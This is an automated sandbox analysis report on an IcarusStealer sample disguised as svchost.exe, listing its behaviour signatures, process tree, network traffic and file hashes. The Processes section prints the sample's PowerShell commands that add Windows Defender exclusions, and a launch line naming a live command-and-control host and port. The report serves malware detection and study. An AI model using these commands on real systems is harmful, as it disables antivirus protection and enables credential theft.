Malware Analysis Report

2024-08-06 08:21

Sample ID 240309-swressbg6z
Target svchost.exe
SHA256 ade93fc6c27fa1b57d864ebbcea4cec99bfb8556115496051bc8a10b0efde04d
Tags
icarusstealer persistence stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ade93fc6c27fa1b57d864ebbcea4cec99bfb8556115496051bc8a10b0efde04d

Threat Level: Known bad

The file svchost.exe was found to be: Known bad.

Malicious Activity Summary

icarusstealer persistence stealer

IcarusStealer

Modifies Installed Components in the registry

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Enumerates connected drives

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-03-09 15:28

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-09 15:28

Reported

2024-03-09 15:30

Platform

win10v2004-20240226-en

Max time kernel

7s

Max time network

62s

Command Line

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

Signatures

IcarusStealer

stealer icarusstealer

Modifies Installed Components in the registry

persistence

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3368 set thread context of 220 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{506CF92D-2348-44C8-A7CA-5CFD619112B9} C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3368 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3368 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3368 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4472 wrote to memory of 2204 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4472 wrote to memory of 2204 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4472 wrote to memory of 2204 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\explorer.exe
PID 3368 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\explorer.exe
PID 3368 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 3368 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 3368 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 220 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 220 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 220 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 220 wrote to memory of 4076 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 220 wrote to memory of 4076 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 220 wrote to memory of 4076 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\Start.exe
PID 1660 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\Start.exe
PID 4644 wrote to memory of 3880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4644 wrote to memory of 3880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4644 wrote to memory of 3880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4076 wrote to memory of 2896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4076 wrote to memory of 2896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4076 wrote to memory of 2896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\20elnnae\20elnnae.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75FB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCADAA17DA99B940328E167AEB45BAC584.TMP"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 PUGlcQLxe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 PUGlcQLxe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\Start.exe & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit

C:\Users\Admin\AppData\Local\Temp\Start.exe

C:\Users\Admin\AppData\Local\Temp\Start.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 case-shield.gl.at.ply.gg udp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 8.8.8.8:53 17.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 34.117.186.192:80 ipinfo.io tcp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp

Files

memory/3368-0-0x0000000075150000-0x0000000075900000-memory.dmp

memory/3368-1-0x0000000000590000-0x0000000000612000-memory.dmp

memory/3368-2-0x00000000054C0000-0x000000000555C000-memory.dmp

memory/3368-3-0x0000000005560000-0x00000000055F2000-memory.dmp

memory/3368-4-0x00000000071C0000-0x0000000007764000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\20elnnae\20elnnae.cmdline

MD5 80e5e8cec2758009460e985a799ca6b4
SHA1 89fc0e1ac64a3d23ee2e83086957e63dd5b7cd2e
SHA256 ecedde26d1fb9ab58e2e3b8cfbb41514cd629c0e531049bc0c1b0ee402465595
SHA512 becc050e4a07eec5710f59e371bd8653b0274f84e9323ac7509f6895fba6ad69c082deae3bd7ed68428a8b1487a016f3e169c846836c88c4c47eb52d3db110a2

\??\c:\Users\Admin\AppData\Local\Temp\20elnnae\20elnnae.0.cs

MD5 14846c9faaef9299a1bf17730f20e4e6
SHA1 8083da995cfaa0e8e469780e32fcff1747850eb6
SHA256 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

\??\c:\Users\Admin\AppData\Local\Temp\CSCADAA17DA99B940328E167AEB45BAC584.TMP

MD5 810535a8ae563d6aa53635a1bb1206ff
SHA1 f5ba39f1a455eb61efe5022b524892249ee75dce
SHA256 7f2c2a29a5f1c0d994fa4c2fccc11a8f3f5f5d4d97ada18aea94971664c8992f
SHA512 5662b39b29d33bff2e8de4cf3878a6e58b7a163cc93311f4c82f03e73b239a76bb9064ed0c4a6d01cceb858663462345cae78999cfa3668ef975cf85dfff138d

C:\Users\Admin\AppData\Local\Temp\RES75FB.tmp

MD5 c94fa213d51f3046b4fee71f216be2fe
SHA1 d4b4e1cd9d16184d2ff5d687c13f3915f5d97e51
SHA256 52e15efb7ab936117b0424adf8df1ed4a0d346746097de7d525752d1cb455c0d
SHA512 07963f3c03c6de7759d2043fb5b62313a0c056de8570dc1ae636a4f61f3c3c8f74279be90d941c485df1a5972a000921b1083a2b2ec5f303e6169d8bf158f8c8

memory/220-17-0x0000000000400000-0x0000000000424000-memory.dmp

memory/220-18-0x0000000075150000-0x0000000075900000-memory.dmp

memory/220-19-0x0000000005580000-0x0000000005590000-memory.dmp

memory/3368-21-0x0000000075150000-0x0000000075900000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Start.exe

MD5 65553b8955e11c0813ae56b6502071fe
SHA1 48ca68eb75a01f6a5e4329addb9b5b4b7bf98b4c
SHA256 647fffa6f573e913ec1f26b43fcf731e48e2d307f45f023c66d49d71240623f8
SHA512 ca9403803be7c0b07c39a12faca0aa3043507c1adae4bafb570868a9e6f8548786222e3c3d4c8724ffec10011035fa354318857864a4b4c97701d5d9650ebef8

memory/544-25-0x0000000000DC0000-0x0000000000DC8000-memory.dmp

memory/2896-26-0x0000000003360000-0x0000000003396000-memory.dmp

memory/544-28-0x00007FFE86B90000-0x00007FFE87651000-memory.dmp

memory/3880-29-0x0000000004530000-0x0000000004540000-memory.dmp

memory/2896-27-0x0000000005A80000-0x00000000060A8000-memory.dmp

memory/2896-30-0x0000000075150000-0x0000000075900000-memory.dmp

memory/2896-31-0x0000000005440000-0x0000000005450000-memory.dmp

memory/3880-32-0x0000000004530000-0x0000000004540000-memory.dmp

memory/2896-33-0x0000000005440000-0x0000000005450000-memory.dmp

memory/3880-34-0x0000000075150000-0x0000000075900000-memory.dmp

memory/2896-35-0x00000000059C0000-0x00000000059E2000-memory.dmp

memory/3880-36-0x00000000053F0000-0x0000000005456000-memory.dmp

memory/3880-37-0x0000000005460000-0x00000000054C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_12weuq1l.24h.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3880-56-0x00000000054D0000-0x0000000005824000-memory.dmp

memory/2896-59-0x0000000006960000-0x000000000697E000-memory.dmp

memory/2896-60-0x0000000006A10000-0x0000000006A5C000-memory.dmp

memory/3880-61-0x0000000004530000-0x0000000004540000-memory.dmp

memory/3880-66-0x000000007F770000-0x000000007F780000-memory.dmp

memory/3880-68-0x00000000701D0000-0x000000007021C000-memory.dmp

memory/3880-67-0x0000000006A40000-0x0000000006A72000-memory.dmp

memory/2896-84-0x00000000701D0000-0x000000007021C000-memory.dmp

memory/4276-83-0x000001717E540000-0x000001717E560000-memory.dmp

memory/3880-82-0x0000000006A80000-0x0000000006B23000-memory.dmp

memory/3880-80-0x0000000006060000-0x000000000607E000-memory.dmp

memory/2896-70-0x000000007EE90000-0x000000007EEA0000-memory.dmp

memory/4276-87-0x000001717E8C0000-0x000001717E8E0000-memory.dmp

memory/800-85-0x0000000003680000-0x0000000003681000-memory.dmp

memory/4276-98-0x000001717D7D0000-0x000001717D7F0000-memory.dmp

memory/3880-108-0x0000000007420000-0x0000000007A9A000-memory.dmp

memory/3880-109-0x0000000006DE0000-0x0000000006DFA000-memory.dmp

memory/220-110-0x0000000075150000-0x0000000075900000-memory.dmp

memory/3880-111-0x0000000006E60000-0x0000000006E6A000-memory.dmp

memory/3880-112-0x0000000007050000-0x00000000070E6000-memory.dmp

memory/2896-113-0x0000000007E90000-0x0000000007EA1000-memory.dmp

memory/3880-114-0x0000000007010000-0x000000000701E000-memory.dmp

memory/3880-115-0x0000000007020000-0x0000000007034000-memory.dmp

memory/3880-116-0x0000000007110000-0x000000000712A000-memory.dmp

memory/2896-117-0x0000000007FB0000-0x0000000007FB8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 85f7b21f78ffcce8f30b0589ae6e1578
SHA1 14654f7fbc30e5e58d9bb6fa57360d3458fdc484
SHA256 e1365c3babc0f5f8487ad855a43970d8dba206eb3fc6b01ab9132a5c5813629f
SHA512 11ec10dc0eb87ea219b905f079c407eba390ec9b2c0399cb3f6e2014a0db2ac88c673b5d8a9b616338a3bdc4d2ed1dde432bf2fdae207210eca31dbcce4e15c1

memory/3880-123-0x0000000075150000-0x0000000075900000-memory.dmp

memory/2896-124-0x0000000075150000-0x0000000075900000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\1HCECE5V\microsoft.windows[1].xml

MD5 6583a2f89cc3c90f77ffa922acf7ee63
SHA1 eccd205c1bb4764f160e86cfd0d860976c32708f
SHA256 34cbdb325cf0420e4bfbc19da431b639890b153b6ac0635ce79ba37ffc677ac2
SHA512 0c7daec9157074607177f75d7ccf190027d9e1830d832cbf16426bfcf221258db4fba74ee35f20c85a9bd6022a1db0409a2f3ec84ecc7317142cf9759eead021

memory/4084-132-0x00000211C4730000-0x00000211C4750000-memory.dmp

memory/4084-134-0x00000211C46F0000-0x00000211C4710000-memory.dmp

memory/4084-137-0x00000211C4D00000-0x00000211C4D20000-memory.dmp

memory/3004-153-0x0000021F46E00000-0x0000021F46E20000-memory.dmp

memory/3004-157-0x0000021F46DC0000-0x0000021F46DE0000-memory.dmp

memory/3004-159-0x0000021F471E0000-0x0000021F47200000-memory.dmp

memory/220-167-0x0000000005580000-0x0000000005590000-memory.dmp

memory/544-168-0x00007FFE86B90000-0x00007FFE87651000-memory.dmp

memory/4724-169-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/4724-171-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/4724-170-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/4724-175-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/4724-176-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/4724-177-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/4724-178-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/4724-179-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/4724-180-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/4724-181-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/712-189-0x000002A77ECD0000-0x000002A77ECF0000-memory.dmp

memory/712-191-0x000002A77EC90000-0x000002A77ECB0000-memory.dmp

memory/712-193-0x000002A77F0B0000-0x000002A77F0D0000-memory.dmp

memory/5192-210-0x0000015CD6EB0000-0x0000015CD6ED0000-memory.dmp

memory/5192-212-0x0000015CD6E70000-0x0000015CD6E90000-memory.dmp

memory/5192-214-0x0000015CD7480000-0x0000015CD74A0000-memory.dmp

memory/5624-231-0x000002006C320000-0x000002006C340000-memory.dmp

memory/5624-233-0x000002006BFD0000-0x000002006BFF0000-memory.dmp

memory/5624-235-0x000002006C6F0000-0x000002006C710000-memory.dmp

memory/6000-252-0x000001E2A9860000-0x000001E2A9880000-memory.dmp